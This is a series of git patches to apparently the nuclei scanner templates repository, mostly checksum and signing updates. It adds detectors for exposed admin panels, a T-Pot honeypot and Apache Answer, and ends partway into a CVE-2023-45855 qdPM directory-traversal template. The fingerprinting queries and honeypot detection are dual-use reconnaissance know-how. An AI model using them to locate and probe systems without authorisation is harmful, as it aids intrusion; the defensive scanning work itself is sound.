-http/exposed-panels/ackee-panel.yaml:2e660b70c0043f4ff3630b1ea2bc757c8099d06b +http/exposed-panels/ackee-panel.yaml:fc048c64a3be4b70abcbbdab43592287f34db03d http/exposed-panels/acrolinx-dashboard.yaml:2238288d59b3af798ae446173975a84abb7dfcea http/exposed-panels/acti-panel.yaml:628420846539ed0cf69e5689f49ab4e57a26a451 http/exposed-panels/active-admin-exposure.yaml:504071b3c78140c2d6866df302226fe9f7bdd733 @@ -5083,6 +5083,7 @@ http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbb http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25 http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa http/honeypot/snare-honeypot-detect.yaml:b63d27a24618602947f861b69eec3ceee8c08bd5 +http/honeypot/tpot-honeypot-detect.yaml:05ed4e7cc965374521c470e85244357e7393df96 http/iot/ampguard-wifi-setup.yaml:3fdb76a85fa7376b4ddef9a2af7f4cfadd9db2fb http/iot/apc-ups-login.yaml:915c40c7c4e581a0636cc99d6d7ac0582f7da117 http/iot/automation-direct.yaml:9b578eb3fea63e67a0c939c9cce372e94ad3de19 @@ -5509,7 +5510,7 @@ http/misconfiguration/linktap-gateway-exposure.yaml:8445d5ca649bd0696ca61bb561b3 http/misconfiguration/locust-exposure.yaml:a05194cd9aa186052bbae31223d52c0ea9ab3b68 http/misconfiguration/lvm-exporter-metrics.yaml:f1cdf9f009abc6debe3fc3c58740d68b00322c64 http/misconfiguration/manage-engine-ad-search.yaml:e58d8b0d6b16f99046807fb55b73df8dc558bd2d -http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:017a97227ca466c4831450986e59a3c99ea1f781 +http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:b9cb06e3e9760001311c8864648243fcf1bec38b http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac3db72af84f34e3 http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0f75582ef @@ -8513,7 +8514,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f801ac1e3065b02cb1c91d763ddae8019328bf37 +templates-checksum.txt:23b1af453d65469d014b1b27b0f441f2048fa275 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1e81084409434be9a93ff2f3d94e92f9c70ab36d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 14:12:20 +0530 Subject: [PATCH 166/375] Update and rename wp-bricks-builder-theme.yaml to wp-bricks-builder-theme.yaml --- .../wordpress/{theme => themes}/wp-bricks-builder-theme.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/technologies/wordpress/{theme => themes}/wp-bricks-builder-theme.yaml (100%) diff --git a/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml similarity index 100% rename from http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml rename to http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml From 387b61a2673435ff653fbe2ef9f8e1643262d1d5 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 08:42:48 +0000 Subject: [PATCH 167/375] Auto Template Signing [Mon May 13 08:42:48 UTC 2024] :robot: --- http/honeypot/tpot-honeypot-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/honeypot/tpot-honeypot-detect.yaml b/http/honeypot/tpot-honeypot-detect.yaml index a999be727a..12525a4c18 100644 --- a/http/honeypot/tpot-honeypot-detect.yaml +++ b/http/honeypot/tpot-honeypot-detect.yaml @@ -28,3 +28,4 @@ http: - type: status status: - 200 +# digest: 4b0a0048304602210092e8c105082a6686c4a5241f7fe90b7fe5f5f14e5e65ee874e138dd69c1462b3022100d38690efa1cc7e6e88c421640d5647ef94b715ac36a843d633116ae915c69d6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1b99086e88de6b9c60897e0b2d9f5c1d0042d788 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 14:13:55 +0530 Subject: [PATCH 168/375] metadata update --- http/technologies/apache/apache-answer-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/technologies/apache/apache-answer-detect.yaml b/http/technologies/apache/apache-answer-detect.yaml index c9a4562f57..12e0c76523 100644 --- a/http/technologies/apache/apache-answer-detect.yaml +++ b/http/technologies/apache/apache-answer-detect.yaml @@ -9,8 +9,8 @@ info: reference: - https://answer.apache.org/ metadata: - shodan-query: html:"Apache Answer" - fofa-query: body="Apache Answer" + shodan-query: http.favicon.hash:523757057 + fofa-query: icon_hash="523757057" verified: true max-request: 1 tags: detect,tech,apache From 8dc7a1cf21920e55212d5834ba6950cf0d31194a Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 08:45:12 +0000 Subject: [PATCH 169/375] Auto Generated New Template Addition List [Mon May 13 08:45:12 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e39e76e6d8..507ffbb7fd 100644 --- a/.new-additions +++ b/.new-additions @@ -13,3 +13,4 @@ http/misconfiguration/unigui-server-monitor-exposure.yaml http/technologies/craftercms-detect.yaml http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml +http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml From 4249a0dbdd9ecd31b5ae329b068d15db753226f1 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 08:45:23 +0000 Subject: [PATCH 170/375] Auto Generated Templates Checksum [Mon May 13 08:45:23 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6bf43d12bd..f4a1a438ce 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5083,7 +5083,7 @@ http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbb http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25 http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa http/honeypot/snare-honeypot-detect.yaml:b63d27a24618602947f861b69eec3ceee8c08bd5 -http/honeypot/tpot-honeypot-detect.yaml:05ed4e7cc965374521c470e85244357e7393df96 +http/honeypot/tpot-honeypot-detect.yaml:d6bba366446a11da0938639a63c137fff9baf522 http/iot/ampguard-wifi-setup.yaml:3fdb76a85fa7376b4ddef9a2af7f4cfadd9db2fb http/iot/apc-ups-login.yaml:915c40c7c4e581a0636cc99d6d7ac0582f7da117 http/iot/automation-direct.yaml:9b578eb3fea63e67a0c939c9cce372e94ad3de19 @@ -7172,6 +7172,7 @@ http/technologies/wordpress/plugins/wps-hide-login.yaml:49e23dfebb88ab4c3822f56d http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:74b65c6c5ca927a3cc48713f2e12af3315585a02 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b585238fc372f9d7131fb53c9bde96f0c8224553 +http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cc594840e6c1eb49fa2bbcc0c531cb1d6e6ed16a http/technologies/wordpress-detect.yaml:cffcda2750ea67cb0bfe228180718a5071f9e031 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f http/technologies/wso2-products-detect.yaml:810c03f8a2986fd7939b83bca35b9a6f95196a63 @@ -8514,7 +8515,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:23b1af453d65469d014b1b27b0f441f2048fa275 +templates-checksum.txt:ff1d3000b3eb53a7ecdce199268892f1f7334f14 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0d1b5506aac856090be193b1d13cf4004b907ffd Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 08:45:58 +0000 Subject: [PATCH 171/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 05cd350984..e8d3632b80 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -18,6 +18,7 @@ on: - 'http/technologies/craftercms-detect.yaml' - 'http/technologies/statamic-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' + - 'http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From a8a2c05530783c003d3a35757e30f550eecbdc00 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 08:46:59 +0000 Subject: [PATCH 172/375] Auto Template Signing [Mon May 13 08:46:59 UTC 2024] :robot: --- http/misconfiguration/microsoft/ms-exchange-local-domain.yaml | 2 +- http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml index 602a0d8de5..6d23425582 100644 --- a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml +++ b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml @@ -42,4 +42,4 @@ http: - type: kval kval: - x_calculatedbetarget -# digest: 490a0046304402205f025e53bc125c91f858165a0912ddc8edd46b6b2370f2ef02cad79aa821edb002200f38bd6dc2bf6d5add1b15173de97999b01080b7297cc21eeee3206f3aed7a2d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210097f4e7ab5764e0db53da23c04266b429b571322e42b0fad09912690d7b6b6fdd02202724f2e0e85ee16b159f4fea95e7e21447c003fae169973816932c90f362a2c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml index adae776bda..802b5c5f54 100644 --- a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml +++ b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml @@ -34,3 +34,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100c4459c83f851208e488f0f5bbeba4f40f1c2b14a227b689dba16c4c452d198b702206c63a5349ee0a6a1c5ba1f9065886fc44766c900aa9058cdda45ad713aa87241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From bbfb734196355bfdc2d50c95ea25af8b6534ce72 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 12:28:22 +0330 Subject: [PATCH 173/375] Update umami-panel.yaml --- http/exposed-panels/umami-panel.yaml | 19 ++++++++++++++++++- 1 file changed, 18 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index 8f4d13b1de..1087d0f2b1 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -15,6 +15,8 @@ info: shodan-query: http.favicon.hash:-130447705 tags: panel,umami,login,detect +flow: http(1) && http(2) + http: - method: GET path: @@ -35,4 +37,19 @@ http: - type: dsl dsl: - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" -# digest: 490a00463044022029194c0dffdde61fa306eed121e4193ed634878016007b77b6f7b55c3f9de11102204cddda016f7544b4b498c462c250522872b003cfeb36e329adecf572b1516411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +http: + - method: GET + path: + - "{{BaseURL}}/~404" + + matchers: + - type: status + status: + - 404 + + extractors: + - type: regex + part: body + regex: + - 'v(?P<version>\d+\.\d+\.\d+)' From 873ba5e4f3a741127d8690ce084cfa201ce31d66 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <m.a.dehghani609@gmail.com> Date: Mon, 13 May 2024 12:37:35 +0330 Subject: [PATCH 174/375] Update umami-panel.yaml --- http/exposed-panels/umami-panel.yaml | 6 ------ 1 file changed, 6 deletions(-) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index 1087d0f2b1..a7426f180e 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -38,16 +38,10 @@ http: dsl: - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" -http: - method: GET path: - "{{BaseURL}}/~404" - matchers: - - type: status - status: - - 404 - extractors: - type: regex part: body From 4ebeee061759bb9ba36a99b0dc9abaf6cf5ffa0d Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 09:08:32 +0000 Subject: [PATCH 175/375] Auto Generated New Template Addition List [Mon May 13 09:08:32 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 507ffbb7fd..10db97c58d 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ http/honeypot/tpot-honeypot-detect.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml +http/technologies/apache/apache-answer-detect.yaml http/technologies/craftercms-detect.yaml http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml From d390bdd363ea609d893c157a3077a74a8b385b1c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 09:08:38 +0000 Subject: [PATCH 176/375] Auto Generated Templates Checksum [Mon May 13 09:08:38 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f4a1a438ce..c024fe839d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5510,7 +5510,7 @@ http/misconfiguration/linktap-gateway-exposure.yaml:8445d5ca649bd0696ca61bb561b3 http/misconfiguration/locust-exposure.yaml:a05194cd9aa186052bbae31223d52c0ea9ab3b68 http/misconfiguration/lvm-exporter-metrics.yaml:f1cdf9f009abc6debe3fc3c58740d68b00322c64 http/misconfiguration/manage-engine-ad-search.yaml:e58d8b0d6b16f99046807fb55b73df8dc558bd2d -http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:b9cb06e3e9760001311c8864648243fcf1bec38b +http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:bc55398c10b87bc6a5c507b4710e3462b264f935 http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac3db72af84f34e3 http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0f75582ef @@ -6576,6 +6576,7 @@ http/technologies/ambassador-edge-stack-detect.yaml:fcb8fa46e689fb4d35bb7fbd4be8 http/technologies/angular-detect.yaml:7719617c08923ab10058ecbc5d9fe19ff7195d77 http/technologies/ansible-awx-detect.yaml:44114d7cf04fcf41b49e86fee243b0c5ecc2ed2b http/technologies/apache/airflow-detect.yaml:36837eb295b1c7ffced3d9864087d6dac52969dd +http/technologies/apache/apache-answer-detect.yaml:00f468b9673de4e23c4afa0e40db25ebee4b0f96 http/technologies/apache/apache-axis-detect.yaml:55d59a4142e61ae3ead1bf03594767f59cac83dd http/technologies/apache/apache-cocoon-detect.yaml:773bd2977ddbb3403acfcd0f8e4cf10c81b84495 http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa249507 @@ -7172,7 +7173,7 @@ http/technologies/wordpress/plugins/wps-hide-login.yaml:49e23dfebb88ab4c3822f56d http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:74b65c6c5ca927a3cc48713f2e12af3315585a02 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b585238fc372f9d7131fb53c9bde96f0c8224553 -http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cc594840e6c1eb49fa2bbcc0c531cb1d6e6ed16a +http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:823e6d8fb3f52400cd29e17aa6e9d9e5215fb639 http/technologies/wordpress-detect.yaml:cffcda2750ea67cb0bfe228180718a5071f9e031 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f http/technologies/wso2-products-detect.yaml:810c03f8a2986fd7939b83bca35b9a6f95196a63 @@ -8515,7 +8516,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ff1d3000b3eb53a7ecdce199268892f1f7334f14 +templates-checksum.txt:6f896504cd0d198a4e77b3af1e34b9a542b1a176 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From eafcf06760ac3db05b750397c5a08edead3e7ff5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 09:09:15 +0000 Subject: [PATCH 177/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e8d3632b80..ad1014d6de 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -15,6 +15,7 @@ on: - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' + - 'http/technologies/apache/apache-answer-detect.yaml' - 'http/technologies/craftercms-detect.yaml' - 'http/technologies/statamic-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' From b15c5f1e3ee1726eaeda652045e04a4f4375e215 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 09:10:18 +0000 Subject: [PATCH 178/375] Auto Generated Templates Checksum [Mon May 13 09:10:18 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c024fe839d..bfe034ce43 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4030,7 +4030,7 @@ http/exposed-panels/mailhog-panel.yaml:086f46cbe44037b7a0e98e2de15e3b244478c498 http/exposed-panels/mailwatch-login.yaml:5806b40c7aba9a02c1df2d3984844a3d0fbda20c http/exposed-panels/maltrail-panel.yaml:e64bf45e9330011747c012809705e894700e308b http/exposed-panels/mantisbt-panel.yaml:a79ef369723d43f4d20f4d94abe7bbabec3afa04 -http/exposed-panels/matomo-login-portal.yaml:39af2391e82e09f349ad6ee47898d5604fa4ad25 +http/exposed-panels/matomo-panel.yaml:83b26c8dc76d00f712f199f43099c80dcad3d208 http/exposed-panels/mautic-crm-panel.yaml:53a7b87d599c64c95672e30524f3c8bfe053160d http/exposed-panels/memos-panel.yaml:889e1696bded69cb5833dc1cd22b44ac49318773 http/exposed-panels/meshcentral-login.yaml:6112dd7a01bf42c06b47b029f3aafb08d85f7ee0 @@ -8516,7 +8516,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6f896504cd0d198a4e77b3af1e34b9a542b1a176 +templates-checksum.txt:cad97fba8e3dd4acd41ee77c82b8b3e7d5dc5d8c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 38e146bf916d84e5a4d595e8d9d19e3c68b27bb0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 09:10:19 +0000 Subject: [PATCH 179/375] Auto Template Signing [Mon May 13 09:10:19 UTC 2024] :robot: --- http/technologies/apache/apache-answer-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/apache/apache-answer-detect.yaml b/http/technologies/apache/apache-answer-detect.yaml index 12e0c76523..47afbcc440 100644 --- a/http/technologies/apache/apache-answer-detect.yaml +++ b/http/technologies/apache/apache-answer-detect.yaml @@ -42,3 +42,4 @@ http: name: version regex: - '"version":"([^"]+)"' +# digest: 4b0a00483046022100e8b6cf0b4a146a98e2ea5be56454a84686c4de20f506b9c297c3b34b02905d930221008eb6c97ad0a6509d1e883e58004163afbfe3453aa32e30608e988f5e8df25d2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 2125fe9dced44a63453cf1c14d0a3bab5f8a5206 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 09:11:11 +0000 Subject: [PATCH 180/375] Auto Generated Templates Checksum [Mon May 13 09:11:11 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index bfe034ce43..910422913e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -210,7 +210,7 @@ dast/vulnerabilities/ssti/reflection-ssti.yaml:f88426f514ecbe514a5b988b2e826d967 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 dast/vulnerabilities/xss/reflected-xss.yaml:1faff32e9ad4bb73f0476c526f9b6ef6d5a51757 dast/vulnerabilities/xxe/generic-xxe.yaml:54b04c0c3b8d50d6305ed48ac7997f1aeeea426d -dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 +dns/azure-takeover-detection.yaml:aa7033fb366a4fb11dc5b575f20908007cda26f2 dns/bimi-detect.yaml:49b1f8b7289261ba3926483a41fa213f921248f2 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 @@ -6576,7 +6576,7 @@ http/technologies/ambassador-edge-stack-detect.yaml:fcb8fa46e689fb4d35bb7fbd4be8 http/technologies/angular-detect.yaml:7719617c08923ab10058ecbc5d9fe19ff7195d77 http/technologies/ansible-awx-detect.yaml:44114d7cf04fcf41b49e86fee243b0c5ecc2ed2b http/technologies/apache/airflow-detect.yaml:36837eb295b1c7ffced3d9864087d6dac52969dd -http/technologies/apache/apache-answer-detect.yaml:00f468b9673de4e23c4afa0e40db25ebee4b0f96 +http/technologies/apache/apache-answer-detect.yaml:0edd4322267dfd814e651abe28b611f686680736 http/technologies/apache/apache-axis-detect.yaml:55d59a4142e61ae3ead1bf03594767f59cac83dd http/technologies/apache/apache-cocoon-detect.yaml:773bd2977ddbb3403acfcd0f8e4cf10c81b84495 http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa249507 @@ -8516,7 +8516,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:cad97fba8e3dd4acd41ee77c82b8b3e7d5dc5d8c +templates-checksum.txt:11807a89775af584dc3410d74f2576e8276bde19 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From fc23e21aabb1f48b86b8dc8a444beeabe492a668 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 09:12:58 +0000 Subject: [PATCH 181/375] Auto Template Signing [Mon May 13 09:12:58 UTC 2024] :robot: --- dns/azure-takeover-detection.yaml | 1 + http/exposed-panels/matomo-panel.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index fdddd8cff0..a3bf3add6e 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -51,3 +51,4 @@ dns: - type: dsl dsl: - cname +# digest: 4b0a00483046022100d68568731abdd8cfc97f8e47d3886209656605e7c73bfe62944a9d0d440bdd0d0221009fbd2c17dbd3f8faf9eae5e17223431a603a59249c6d151b36f22bbd4723ad6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/matomo-panel.yaml b/http/exposed-panels/matomo-panel.yaml index 840ab0a12a..0fe7fd23af 100644 --- a/http/exposed-panels/matomo-panel.yaml +++ b/http/exposed-panels/matomo-panel.yaml @@ -43,3 +43,4 @@ http: - type: dsl dsl: - "status_code==200 && (\"-2023266783\" == mmh3(base64_py(body)))" +# digest: 4a0a0047304502205217330d775233ed1853dd31211905403034b6f585c3e2b9623fcc9a8b79b5b0022100b9b40d58f73228425c1491bdce70eb1a39d2e087072d50864dad2f181de17cbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 450cfb26d042363666dcf1e1f23efee94899c867 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 14:57:39 +0330 Subject: [PATCH 182/375] Add n8n-panel.yaml --- http/exposed-panels/n8n-panel.yaml | 34 ++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/exposed-panels/n8n-panel.yaml diff --git a/http/exposed-panels/n8n-panel.yaml b/http/exposed-panels/n8n-panel.yaml new file mode 100644 index 0000000000..53a0fbd748 --- /dev/null +++ b/http/exposed-panels/n8n-panel.yaml @@ -0,0 +1,34 @@ +id: n8n-panel + +info: + name: n8n Panel - Detect + author: userdehghani + severity: info + description: | + The worlds most popular workflow automation platform for technical teams + reference: + - https://n8n.io/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-831756631 + tags: panel,n8n,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/signin" + - "{{BaseURL}}/favicon.ico" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - '<title>n8n.io' + case-insensitive: true + + - type: dsl + dsl: + - "status_code==200 && (\"-831756631\" == mmh3(base64_py(body)))" From be89fd721c2bef40184f399fbfc69f586025541d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 17:32:41 +0530 Subject: [PATCH 183/375] Create CVE-2023-45855.yaml --- http/cves/2023/CVE-2023-45855.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-45855.yaml diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml new file mode 100644 index 0000000000..d3c814f700 --- /dev/null +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-45855 + +info: + name: qdPM 9.2 Directory Traversal Vulnerability + author: DhiyaneshDk + severity: high + description: qdPM 9.2 allows Directory Traversal to list files and directories by navigating to the 